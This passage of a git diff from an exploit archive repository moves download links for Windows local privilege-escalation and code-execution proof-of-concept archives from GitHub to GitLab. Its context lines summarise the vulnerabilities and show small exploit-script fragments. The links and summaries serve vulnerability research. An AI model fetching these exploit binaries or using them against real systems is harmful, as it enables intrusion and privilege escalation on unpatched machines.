the user attempts to open the file immediately, the action will fail. However, an assembler coded .exe attachment which has had it's extension changed to .bat will execute immediately. Regardless of the extension type, the user is able to save the attachment to disk. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21096.zip \ No newline at end of file diff --git a/exploits/windows/local/21344.txt b/exploits/windows/local/21344.txt index c1a843aad..122ca8e11 100644 --- a/exploits/windows/local/21344.txt +++ b/exploits/windows/local/21344.txt @@ -6,4 +6,4 @@ The debugging subsystem, which is available to all users, may be used to create 05/06/2002: There have been reports of a mass-mailing worm that exploits this vulnerability using the proof-of-concept exploit. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21344.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21344.zip \ No newline at end of file diff --git a/exploits/windows/local/21690.txt b/exploits/windows/local/21690.txt index 3319e74f5..595dbdfaa 100644 --- a/exploits/windows/local/21690.txt +++ b/exploits/windows/local/21690.txt @@ -10,4 +10,4 @@ Another proof-of-concept has been released by Brett Moore in a paper entitled "S Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21690.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21690.rar \ No newline at end of file diff --git a/exploits/windows/local/21691.txt b/exploits/windows/local/21691.txt index 7860b9f41..3702e7175 100644 --- a/exploits/windows/local/21691.txt +++ b/exploits/windows/local/21691.txt @@ -10,4 +10,4 @@ Another proof-of-concept has been released by Brett Moore in a paper entitled "S Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21691.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21691.zip \ No newline at end of file diff --git a/exploits/windows/local/22193.txt b/exploits/windows/local/22193.txt index 5bf300e37..6cc7b8dea 100644 --- a/exploits/windows/local/22193.txt +++ b/exploits/windows/local/22193.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in WinRAR. The problem occurs when the affec It has been reported that it is possible for an attacker to exploit this issue to run arbitrary instructions. Commands executed in this manner would be run with the privileges of the vulnerable program. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22193.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22193.zip \ No newline at end of file diff --git a/exploits/windows/local/23096.txt b/exploits/windows/local/23096.txt index 75a67b2cc..8b8738ebc 100644 --- a/exploits/windows/local/23096.txt +++ b/exploits/windows/local/23096.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/8538/info The Microsoft WordPerfect Converter, which ships with Office and a number of other products, is prone to a buffer overrun vulnerability. This could result in execution of malicious, attacker-supplied code when a document with malformed parameters is processed by the component. Exploitation would permit an attacker to execute arbitrary code with the privileges of the user opening the malformed document. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23096.zip \ No newline at end of file diff --git a/exploits/windows/local/24200.txt b/exploits/windows/local/24200.txt index 07bf3cce8..36a02ab61 100644 --- a/exploits/windows/local/24200.txt +++ b/exploits/windows/local/24200.txt @@ -28,5 +28,4 @@ A local attacker may exploit this condition to disable the affected firewall com printf("Sent.\n"); CloseHandle(hDevice); - } - + } \ No newline at end of file diff --git a/exploits/windows/local/27282.txt b/exploits/windows/local/27282.txt index e7008dd6e..b13f81837 100644 --- a/exploits/windows/local/27282.txt +++ b/exploits/windows/local/27282.txt @@ -11,7 +11,7 @@ Reference: http://mallocat.com/a-journey-to-antivirus-escalation/ Demo: http://mallocat.com/wp-content/uploads/2013/08/win7.swf Exploit code: http://mallocat.com/wp-content/uploads/2013/08/escalate.7z - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27282.7z + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27282.7z Exploit-DB note: Open and read the reference supplied diff --git a/exploits/windows/local/29125.txt b/exploits/windows/local/29125.txt index fe6b61bb0..7cb52d185 100644 --- a/exploits/windows/local/29125.txt +++ b/exploits/windows/local/29125.txt @@ -14,4 +14,4 @@ Reference : http://mallocat.com/another-journey-to-antivirus-escalation/ Demo: http://mallocat.com/wp-content/uploads/2013/10/avira0.swf Exploit code: http://mallocat.com/wp-content/uploads/2013/10/AviraAvipbbExploit.7z -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29125.7z \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29125.7z \ No newline at end of file diff --git a/exploits/windows/local/29374.txt b/exploits/windows/local/29374.txt index 67dba9a76..c02278b99 100644 --- a/exploits/windows/local/29374.txt +++ b/exploits/windows/local/29374.txt @@ -6,4 +6,4 @@ A local attacker could exploit this issue to execute arbitrary machine code with Versions 4.3.246 and 4.3.268 are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29374.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29374.zip \ No newline at end of file diff --git a/exploits/windows/local/29465.txt b/exploits/windows/local/29465.txt index 8b5219338..b867b06c8 100644 --- a/exploits/windows/local/29465.txt +++ b/exploits/windows/local/29465.txt @@ -6,4 +6,4 @@ A local attacker can exploit this issue to elevate their privileges, which can l Outpost Firewall PRO 4.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29465.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29465.zip \ No newline at end of file diff --git a/exploits/windows/local/29603.txt b/exploits/windows/local/29603.txt index 624fcdde6..a7801a78b 100644 --- a/exploits/windows/local/29603.txt +++ b/exploits/windows/local/29603.txt @@ -6,4 +6,4 @@ Exploiting this flaw permits attackers to bypass the application's component con Comodo Firewall Pro 2.4.17.183 and 2.4.16.174 and Comodo Personal Firewall 2.3.6.81 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29603.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29603.zip \ No newline at end of file diff --git a/exploits/windows/local/29695.txt b/exploits/windows/local/29695.txt index bb180b121..63e58ba72 100644 --- a/exploits/windows/local/29695.txt +++ b/exploits/windows/local/29695.txt @@ -4,4 +4,4 @@ Comodo Firewall Pro is prone to a protection-mechanism-bypass vulnerability. Exploiting this issue allows local attackers to bypass protection mechanisms implemented to restrict access to altering the firewall's configuration settings. This allows them to disable the firewall, aiding them in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29695.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29695.zip \ No newline at end of file diff --git a/exploits/windows/local/29881.txt b/exploits/windows/local/29881.txt index ea5bd03ce..989d22dcd 100644 --- a/exploits/windows/local/29881.txt +++ b/exploits/windows/local/29881.txt @@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/ @w3bd3vil and @abh1sek -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29881.tar.gz +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29881.tar.gz Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS ================================================================= diff --git a/exploits/windows/local/30007.txt b/exploits/windows/local/30007.txt index 1b14e5300..67dc33d12 100644 --- a/exploits/windows/local/30007.txt +++ b/exploits/windows/local/30007.txt @@ -32,4 +32,4 @@ Trendmicro, CDC -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30007.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30007.zip \ No newline at end of file diff --git a/exploits/windows/local/30192.txt b/exploits/windows/local/30192.txt index 1e51f6716..a026e7e4f 100644 --- a/exploits/windows/local/30192.txt +++ b/exploits/windows/local/30192.txt @@ -8,4 +8,4 @@ Kaspersky Internet Security 6.0.2.614 and 6.0.2.621 are vulnerable; other versio NOTE: These issues may be related to BID 23326 (Kaspersky Internet Security Suite Klif.SYS Drive Local Heap Overflow Vulnerability), but this has not been confirmed. If we find that this BID is a duplicate, we will retire it and merge its information into BID 23326. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30192.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30192.zip \ No newline at end of file diff --git a/exploits/windows/local/30680.txt b/exploits/windows/local/30680.txt index c21e8b1db..d7b3d3c70 100644 --- a/exploits/windows/local/30680.txt +++ b/exploits/windows/local/30680.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability allows local attackers to execute arbitrary malici UPDATE: This issue affects only Microsoft Windows XP and 2003 platforms. Microsoft Vista is not affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30680.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30680.zip \ No newline at end of file diff --git a/exploits/windows/local/30681.txt b/exploits/windows/local/30681.txt index 334c6d6d6..ab330f6f7 100644 --- a/exploits/windows/local/30681.txt +++ b/exploits/windows/local/30681.txt @@ -4,4 +4,4 @@ SpeedFan is prone to a local privilege-escalation vulnerability. An attacker could exploit this issue to execute arbitrary machine code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30681.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30681.zip \ No newline at end of file diff --git a/exploits/windows/local/30999.txt b/exploits/windows/local/30999.txt index 9fd0dc741..ba9fff341 100644 --- a/exploits/windows/local/30999.txt +++ b/exploits/windows/local/30999.txt @@ -8,4 +8,4 @@ This issue occurs when the vulnerable driver is running in a Microsoft Windows V This issue affects 'es1371mp.sys' 5.1.3612.0. Given the nature of the issue, other device drivers and versions may also be vulnerable, but this has not been confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30999.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30999.zip \ No newline at end of file diff --git a/exploits/windows/local/31090.txt b/exploits/windows/local/31090.txt index ee9453596..ee2b0751c 100644 --- a/exploits/windows/local/31090.txt +++ b/exploits/windows/local/31090.txt @@ -9,7 +9,7 @@ # Home: http://www.hdwsec.fr # Blog : http://www.hdwsec.fr/blog.html -Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31090.xps +Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31090.xps Description : ============== diff --git a/exploits/windows/local/31667.txt b/exploits/windows/local/31667.txt index 34ef04a98..a686d7330 100644 --- a/exploits/windows/local/31667.txt +++ b/exploits/windows/local/31667.txt @@ -4,4 +4,4 @@ Microsoft Windows is prone to a privilege-escalation vulnerability. Successful exploits may allow authenticated users to elevate their privileges to NetworkService. This allows attackers to execute code with elevated privileges and aids in further exploits. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31667.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31667.zip \ No newline at end of file diff --git a/exploits/windows/local/31895.txt b/exploits/windows/local/31895.txt index 296be9bc0..5c3532644 100644 --- a/exploits/windows/local/31895.txt +++ b/exploits/windows/local/31895.txt @@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt 2. Select all the content in the editor 3. Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31895.7z \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31895.7z \ No newline at end of file diff --git a/exploits/windows/local/32572.txt b/exploits/windows/local/32572.txt index 00e7de901..44b5d3f86 100644 --- a/exploits/windows/local/32572.txt +++ b/exploits/windows/local/32572.txt @@ -9,5 +9,5 @@ The following applications are vulnerable: Anti-Trojan Elite 4.2.1 and earlier Anti-Keylogger Elite 3.3.0 and earlier -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32572-1.zip (AKEProtect_Exp.zip) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32572-2.zip (Atepmon_DoS.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32572-1.zip (AKEProtect_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32572-2.zip (Atepmon_DoS.zip) \ No newline at end of file diff --git a/exploits/windows/local/3260.txt b/exploits/windows/local/3260.txt index b96679f5e..5dae4c45b 100644 --- a/exploits/windows/local/3260.txt +++ b/exploits/windows/local/3260.txt @@ -24,7 +24,7 @@ + Reference : http://www.microsoft.com/technet/security/advisory/932114.mspx - Microsoft Security Advisory (932114) -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3260.doc (02032007-word2000exp.doc) +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3260.doc (02032007-word2000exp.doc) - http://www.returnaddr.org/exploit/word2000 ############ use at your own risk ******* diff --git a/exploits/windows/local/32771.txt b/exploits/windows/local/32771.txt index 6cddb84ef..2a285e384 100644 --- a/exploits/windows/local/32771.txt +++ b/exploits/windows/local/32771.txt @@ -9,4 +9,4 @@ This issue affects versions in the following product groups: Kaspersky AV 2008 Kaspersky AV for WorkStations 6.0 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32771.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32771.zip \ No newline at end of file diff --git a/exploits/windows/local/32850.txt b/exploits/windows/local/32850.txt index 030efe540..f876187b1 100644 --- a/exploits/windows/local/32850.txt +++ b/exploits/windows/local/32850.txt @@ -12,4 +12,4 @@ SlySoft Virtual CloneDrive 5.4.2.3 SlySoft CloneDVD 2.9.2.0 SlySoft CloneCD 5.3.1.3 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32850.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32850.zip \ No newline at end of file diff --git a/exploits/windows/local/32891.txt b/exploits/windows/local/32891.txt index b773c8ac1..154733d8b 100644 --- a/exploits/windows/local/32891.txt +++ b/exploits/windows/local/32891.txt @@ -11,4 +11,4 @@ Windows Server 2003 Windows Vista Windows Server 2008 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32891.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32891.zip \ No newline at end of file diff --git a/exploits/windows/local/32892.txt b/exploits/windows/local/32892.txt index 917e2a581..1f4ba5459 100644 --- a/exploits/windows/local/32892.txt +++ b/exploits/windows/local/32892.txt @@ -9,4 +9,4 @@ The issue affects the following: Windows XP SP2 Windows Server 2003 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32892.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32892.zip \ No newline at end of file diff --git a/exploits/windows/local/32893.txt b/exploits/windows/local/32893.txt index 99f5c7357..51b18fa5b 100644 --- a/exploits/windows/local/32893.txt +++ b/exploits/windows/local/32893.txt @@ -9,4 +9,4 @@ The issue affects the following: Windows Vista Windows Server 2008 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32893.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32893.zip \ No newline at end of file diff --git a/exploits/windows/local/34648.txt b/exploits/windows/local/34648.txt index 440798a3a..3c78ef3a9 100644 --- a/exploits/windows/local/34648.txt +++ b/exploits/windows/local/34648.txt @@ -1,4 +1,4 @@ Exploit: http://www.joxeankoret.com/download/comodo_sandbox_escape/sandbox_test1.tar.gz -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34648.tar.gz (sandbox_test1.tar.gz) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34648.tar.gz (sandbox_test1.tar.gz) Video: http://www.joxeankoret.com/download/comodo_sandbox_escape/video/sandbox_escape1.htm \ No newline at end of file diff --git a/exploits/windows/local/35019.py b/exploits/windows/local/35019.py index 1fbcbfd1f..a0e656628 100755 --- a/exploits/windows/local/35019.py +++ b/exploits/windows/local/35019.py @@ -4,7 +4,7 @@ import zipfile import sys ''' -Full Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35019.tar.gz +Full Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35019.tar.gz Very quick and ugly [SandWorm CVE-2014-4114] exploit builder Exploit Title: CVE-2014-4114 SandWorm builder diff --git a/exploits/windows/local/35216.py b/exploits/windows/local/35216.py index 2f0f33af4..e9b758985 100755 --- a/exploits/windows/local/35216.py +++ b/exploits/windows/local/35216.py @@ -1,5 +1,5 @@ # -# Full exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35216.rar +# Full exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35216.rar # #CVE-2014-6352 OLE Remote Code Execution #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com diff --git a/exploits/windows/local/35661.txt b/exploits/windows/local/35661.txt index aee0d55cf..03e558a7d 100644 --- a/exploits/windows/local/35661.txt +++ b/exploits/windows/local/35661.txt @@ -1,5 +1,5 @@ # Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1 -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35661-poc.zip +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35661-poc.zip Platform: Windows 8.1 Update 32/64 bit (No other OS tested) diff --git a/exploits/windows/local/35901.txt b/exploits/windows/local/35901.txt index 0477ada60..7578f5464 100644 --- a/exploits/windows/local/35901.txt +++ b/exploits/windows/local/35901.txt @@ -25,5 +25,5 @@ FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35901-poc.flv -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35901-windbglog.txt \ No newline at end of file +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-poc.flv +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-windbglog.txt \ No newline at end of file diff --git a/exploits/windows/local/35902.txt b/exploits/windows/local/35902.txt index 17bba251d..f940f716f 100644 --- a/exploits/windows/local/35902.txt +++ b/exploits/windows/local/35902.txt @@ -25,5 +25,5 @@ M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35902-poc.m2v -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35902-windbglog.txt \ No newline at end of file +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-poc.m2v +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-windbglog.txt \ No newline at end of file diff --git a/exploits/windows/local/36424.txt b/exploits/windows/local/36424.txt index 895cc0c5c..69925dd5c 100644 --- a/exploits/windows/local/36424.txt +++ b/exploits/windows/local/36424.txt @@ -41,4 +41,4 @@ Observed Result: Authentication was successful as local system and a file written to the root of the C drive . Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36424.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36424.zip \ No newline at end of file diff --git a/exploits/windows/local/3664.txt b/exploits/windows/local/3664.txt index c59b9d84a..d5af37d71 100644 --- a/exploits/windows/local/3664.txt +++ b/exploits/windows/local/3664.txt @@ -16,6 +16,6 @@ # (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d, and more... http://www.0xdeadbeef.info/exploits/raptor_truecrypt.tgz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3664.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3664.tgz # milw0rm.com [2007-04-04] \ No newline at end of file diff --git a/exploits/windows/local/36826.pl b/exploits/windows/local/36826.pl index 29da33964..f3fe761b2 100755 --- a/exploits/windows/local/36826.pl +++ b/exploits/windows/local/36826.pl @@ -39,4 +39,4 @@ my $shell = open($FILE,">$file"); print $FILE $buff.$nseh.$seh.$nop.$shell; close($FILE); -print "+++++++++++++++++++\n"; +print "+++++++++++++++++++\n"; \ No newline at end of file diff --git a/exploits/windows/local/36859.txt b/exploits/windows/local/36859.txt index 5af8c5379..6233841fa 100644 --- a/exploits/windows/local/36859.txt +++ b/exploits/windows/local/36859.txt @@ -59,7 +59,7 @@ A memory corruption occured within the LZW algorithm that is used to decode GIF. =========== http://protekresearchlab.com/exploits/PRL-2015-05.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36859.pdf +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36859.pdf ############################################################################### \ No newline at end of file diff --git a/exploits/windows/local/36909.rb b/exploits/windows/local/36909.rb index c50b5e4ea..da34bd96b 100755 --- a/exploits/windows/local/36909.rb +++ b/exploits/windows/local/36909.rb @@ -75,4 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/exploits/windows/local/37049.txt b/exploits/windows/local/37049.txt index b4e02a5f1..b4dc1b7fa 100644 --- a/exploits/windows/local/37049.txt +++ b/exploits/windows/local/37049.txt @@ -12,11 +12,11 @@ R136a1 / hfiref0x ## Compiled EXE: ### x86 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe -+ Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-32.exe ++ Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-32.exe ### x64 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe -+ Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-64.exe ++ Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-64.exe ## Source Code: + https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip -+ EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-src.zip \ No newline at end of file ++ EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-src.zip \ No newline at end of file diff --git a/exploits/windows/local/37657.txt b/exploits/windows/local/37657.txt index 03ca14aed..fcc4bcea2 100644 --- a/exploits/windows/local/37657.txt +++ b/exploits/windows/local/37657.txt @@ -17,4 +17,4 @@ it is possible to triggerthe vulnerability and run arbitrary code in the context Exploit code here : https://onedrive.live.com/embed?cid=412A36B6D0A9436A&resid=412A36B6D0A9436A%21156&authkey=AA_JVoZcoM5kvOc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37657.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37657.zip \ No newline at end of file diff --git a/exploits/windows/local/37768.txt b/exploits/windows/local/37768.txt index e82d2474e..d0b499532 100644 --- a/exploits/windows/local/37768.txt +++ b/exploits/windows/local/37768.txt @@ -21,4 +21,4 @@ Tested on x64/x86 Windows 7/8.1 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37768.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37768.zip \ No newline at end of file diff --git a/exploits/windows/local/37799.py b/exploits/windows/local/37799.py index 617acf7e6..8292ed09e 100755 --- a/exploits/windows/local/37799.py +++ b/exploits/windows/local/37799.py @@ -53,4 +53,4 @@ try: print "Evil QSE script created!\nHack'n'Roll" except: print "Can't create Evil QSE script :'(" - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/exploits/windows/local/37925.txt b/exploits/windows/local/37925.txt index 3d06f5022..bd105a9d1 100644 --- a/exploits/windows/local/37925.txt +++ b/exploits/windows/local/37925.txt @@ -39,4 +39,4 @@ Observed Result: The target file has been overwritten with the contents of the log file Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37925.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37925.zip \ No newline at end of file diff --git a/exploits/windows/local/38198.txt b/exploits/windows/local/38198.txt index 4f2641674..3561060d0 100644 --- a/exploits/windows/local/38198.txt +++ b/exploits/windows/local/38198.txt @@ -36,4 +36,4 @@ Observed Result: Thread execution redirected to an arbitrary address of 0x55555555. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38198.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38198.zip \ No newline at end of file diff --git a/exploits/windows/local/38199.txt b/exploits/windows/local/38199.txt index 870429130..3de59f748 100644 --- a/exploits/windows/local/38199.txt +++ b/exploits/windows/local/38199.txt @@ -35,4 +35,4 @@ Observed Result: The token was captured in the low IL process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38199.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38199.zip \ No newline at end of file diff --git a/exploits/windows/local/38200.txt b/exploits/windows/local/38200.txt index c002d7043..a231ec239 100644 --- a/exploits/windows/local/38200.txt +++ b/exploits/windows/local/38200.txt @@ -29,4 +29,4 @@ Observed Result: The target file is deleted Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38200.ps1 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38200.ps1 \ No newline at end of file diff --git a/exploits/windows/local/38201.txt b/exploits/windows/local/38201.txt index f653c0d52..9847bcaf0 100644 --- a/exploits/windows/local/38201.txt +++ b/exploits/windows/local/38201.txt @@ -34,4 +34,4 @@ Observed Result: The passed path has all its files deleted (assuming they can be accessed by local system). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38201.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38201.zip \ No newline at end of file diff --git a/exploits/windows/local/38202.txt b/exploits/windows/local/38202.txt index c3d7f9fb8..99a3d9b81 100644 --- a/exploits/windows/local/38202.txt +++ b/exploits/windows/local/38202.txt @@ -32,4 +32,4 @@ Observed Result: The log file ends up copied to c:\program.exe and can be modified by the current user. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38202.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38202.zip \ No newline at end of file diff --git a/exploits/windows/local/38287.txt b/exploits/windows/local/38287.txt index 3c01369ba..a005b5477 100644 --- a/exploits/windows/local/38287.txt +++ b/exploits/windows/local/38287.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=518 A remotely exploitable stack buffer overflow in ThinApp container parsing. Kaspersky Antivirus (I've tested version 15 and 16) and other products using the Kaspersky Engine (such as ZoneAlarm) are affected. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38287.zip \ No newline at end of file 